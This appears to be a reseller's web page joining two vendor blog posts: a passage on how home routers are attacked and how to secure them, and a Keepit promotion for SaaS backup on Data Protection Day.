Like the local authenticated method, a local unauthenticated attack requires the hacker to connect to the LAN or Wi-Fi or to infect a local device. This time, however, the hacker does not need to know the administrator’s password.

Usually, local unauthenticated attacks involve exploiting some software vulnerability in your router’s firmware (for example, the buffer overflow in its web management function) or accessing misconfigured components (like a default telnet left without password protection).

Remote authenticated (Hacking level: relatively easy)

Remote authenticated attacks are possible against certain routers via the internet, so the hacker doesn’t need to be close to you or join your LAN. They still need to know some default credentials to bypass the service password, but they can also brute force it if necessary.

  • Example: The Huawei LANSwitch model with a default Web UI open to the internet. This exploit was resolved in January 2023 but still acts as a good example of a remote authenticated threat — albeit one that is no longer active.

Remote unauthenticated (Hacking level: very easy)

Remote unauthenticated attacks are the worst-case scenario. Remote unauthenticated attacks can occur if anyone can access the router from the internet, without needing an administrator’s credentials.

Usually, if a router can be accessed in this way, it is the result of the device coming with bad default configuration, a hidden backdoor, or a vulnerability in the software. In some nightmare scenarios, a router may end up with all three of these issues.

A router with these problems can be quickly scanned and exploited by thousands of automated bots or commercial providers (Shodan, for example). It takes between a few minutes and a few hours for the first bot to reach the device once it’s been connected to the internet. After scanning the router, a bot will be able identify the model and use the appropriate script to gain the access.

What happens once you’ve been hacked?

Your router has been hacked. What happens now? After gaining root access, the attacker’s power over the device is unlimited. Here are some of the steps a hacker might take next:

  • Add a persistent backdoor to allow for remote device use or botnet inclusion.

  • View your unencrypted traffic in plain text (using tcpdump, for example).

  • Carry out deep packet inspection (DPI) on any encrypted traffic.

  • Redirect your traffic (for example, through DNS spoofing or by using iptables).

  • Launch social engineering attacks against you (for example, a hacker could redirect you to a fake website, pretending to be your online banking platform, where you might expose sensitive information).

  • Disconnect you from the internet and demand a ransom to restore access.

  • Make your router a proxy for other criminals to perform criminal activities from your IP address (potentially leaving you to convince the police that you weren’t the source of the criminal activity).

  • Hack your other devices (moving laterally) which were not accessible from the internet. If successful, this could allow the hacker to install ransomware or cryptominer malware on your other computers at home.

Still think it’s not worth your time to secure your router?

How to protect your router

If you think it’s time to start protecting your router and the devices connected to it, take the following steps.

  • Understand that your data is valuable. Even if you are not a celebrity or a high-profile politician, it’s still worth a hacker’s time to attack your router. Always see yourself as a potential target. You don’t have to be paranoid, but don’t ignore the risks.

  • Buy a user-friendly router that has good documentation and a clear user interface and that provides technical support and firmware updates. These routers may cost more, but security is a worthwhile investment.

  • Do not trust your ISP. ISPs tend to lower maintenance costs by saving on security. If possible, avoid using the router provided by your ISP, or at least unlock and take full control of it (change the default password, disable remote management, remove backdoors, and enable a firewall).

  • If possible, use WPA3, and protect yourself with a non-dictionary-based password containing at least ten characters. Never use WEP or unencrypted Wi-FI.

  • Use a VPN on your local devices (laptops, phones, TVs) to encrypt traffic.

You should now understand both the risks of an unsecured router and the actions you can take today to protect it. Stay safe!

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Data Protection Day Is Here!

Data Protection Day – also known as Data Privacy Day – is an annual event observed on January 28 to raise awareness about the importance of protecting data and data privacy (think NIS Directive, NIS2 Directive, and GDPR).

It’s here to make data protection, such as SaaS data backup and recovery, top of mind—and for good reason.

Businesses must take the necessary measures to not only ensure the continuity of their operations and to protect themselves from the potentially catastrophic outcomes of a data loss event like ransomware, but to also comply with the increasingly strict demands from legislation such as the NIS2 Directive and the GDPR.

 

Why Is Data Protection Relevant?

As businesses increasingly move operations to software-as-a-service (SaaS) applications to streamline their operations, add flexibility (such as enabling remote work), and reduce operational costs, huge amounts of business-critical cloud data are produced every day, and it becomes ever more important to assess and ensure a robust backup and recovery plan is in place.

There is a widely shared assumption that data stored in a SaaS cloud is automatically backed up and secure since it’s in the cloud. However, that is not always the case as what is offered may not provide the protection necessary for business continuity, data restoration, or compliance: Read more about the M365 shared responsibility model.

Cloud Data Concerns

It should come as no surprise that working with cloud services can come with risks. Ransomware and disaster recovery are more and more frequently in the headlines and serve as cautionary tales. (Read our post about the disruptive power of ransomware attacks here.)

The rapid adoption of SaaS applications has also come with new and increased instances of data loss and breaches—especially in cases where there is a lag between adoption of SaaS apps and adoption of the necessary data protection. Companies may be left vulnerable to costly disruptions, downtime, and devastating fines without an adequate data security plan in place to safeguard mission-critical cloud data.

What Needs to Be Backed Up?

Data protection not only involves “just” backing up cloud SaaS data, but it should also focus on ensuring control of and continuous access to it (and the right access for the correct users at that). As with Microsoft 365 and Azure AD (Active Directory), there is a data plane and a control plane – and both need to be protected.

One way to achieve this is to adopt a solution that can not only protect the data plane but can also preserve and protect the control plane, e.g., the admin center. Coverage of identity and application objects businesses rely on to remain operational is vital. For those using Microsoft 365, it’s important to learn about why you also need Azure AD data protection: Find out why in our AAD blog here.

 

How Do Businesses Protect Their Data?

The best way to mitigate the risks of SaaS is to implement a data protection and management plan. This can involve using cloud-based data backup and recovery solutions which allow businesses to store their data in an independent cloud and access it from anywhere, at any time.

Data protection is especially important for businesses that rely on SaaS data for their operations, which is many, many businesses (Microsoft 365 alone has over 345 million users), as it can help ensure that data is always available, even if there is a disruption with the SaaS provider.

While cloud services can (and do) provide many benefits for businesses, they also present their own set of risks. For example, there is a very real risk that data stored in the cloud could be accessed by unauthorized parties (read our blog about the Zero Trust Principle here), or that data could be lost due to any number of issues, from technical glitches and issues to human error. Therefore, it’s important for companies to follow cloud data protection best practices. Read about backup strategy here.

 

Data Risks and Responsibility

But why is backing up SaaS data so important? Because it allows companies to mitigate the effects of ransomware and other data loss events. Many SaaS providers (e.g., Google, Microsoft, Salesforce) have shared responsibility models that state you, the customer, are responsible for the data created and processed.

Here are a few reasons why backup is vital:

  1. Data breaches can happen to anyone.

    While no company is immune to data breaches, having a backup solution in place can help minimize (or even nullify) the impact of a breach, helping businesses get up and running again quickly.
  2. Data loss can be costly.

    Losing data can lead to lost productivity and lost revenue within the company, and it can even result in substantial legal penalties. (Read our NIS2 post here.) According to the World Economic Forum, “historically severe fines for data loss are also helping change the cost-benefit assessment around investment in cybersecurity measures.” By implementing a backup solution, businesses can minimize the impact of data loss, avoid fines, and get back to business as usual faster, and more comprehensively, than without.
  3. The future is uncertain.

    A bit cliché, but it’s impossible to predict the future and that includes the risks to your data. According to the ESG (Enterprise Strategy Group) ransomware e-Book, “79% of respondent organizations report having experienced a ransomware attack within the last year.” By implementing a backup solution now, businesses can protect themselves against potential risks down the road – which stand to only increase.

 

Where to Go from Here?

Data Protection Day reminds us that SaaS data (and the protection of it) is essential to many daily operations. Not only that, with the scope and penalties of NIS2 and GDPR, enterprises are obligated to ensure a dedicated data protection solution is in place.

Researching a third-party backup solution like Keepit can simplify the complexity of the current SaaS data protection environment. Businesses can maintain control of their data always and protect themselves against data loss events and mitigate the impacts of breaches and ransomware – all while remaining compliant.

Don’t wait until it’s too late — what better way to celebrate Data Protection Day than to start backing up your SaaS data. Continue your journey by exploring our free e-guide “Leading SaaS Data Security: Raising the Bar for Data Protection in the Cloud Era.”

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.